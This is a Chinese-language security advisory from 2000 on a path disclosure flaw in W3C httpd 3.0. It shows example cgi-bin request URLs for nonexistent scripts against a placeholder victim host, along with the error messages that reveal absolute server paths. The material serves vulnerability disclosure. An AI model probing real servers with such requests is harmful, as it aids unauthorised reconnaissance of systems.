安全研究
安全漏洞
W3C httpd 绝对路径泄露漏洞
发布日期:2000-01-19
更新日期:2000-01-19
受影响系统:W3C httpd 3.0
描述:
当向W3C web服务器(如CERN)请求不存在的cgi-bin文档时,返回的出错信息中会泄露目标主机文件系统的web文档绝对路径。以下例子由Niklas Schiffler <nick@nightlabs.de>提供:
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.victim.com/cgi-bin/ls
返回:
Bad script request -- neither '/usr/local/etc/ls' nor '/usr/local/etc/ls.pp' is executable
http://www.victim.com/cgi-bin/cat
返回:
Bad script request -- neither '/usr/local/etc/cat' nor '/usr/local/etc/cat.pp' is executable
建议:
暂无。
浏览次数:6393
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
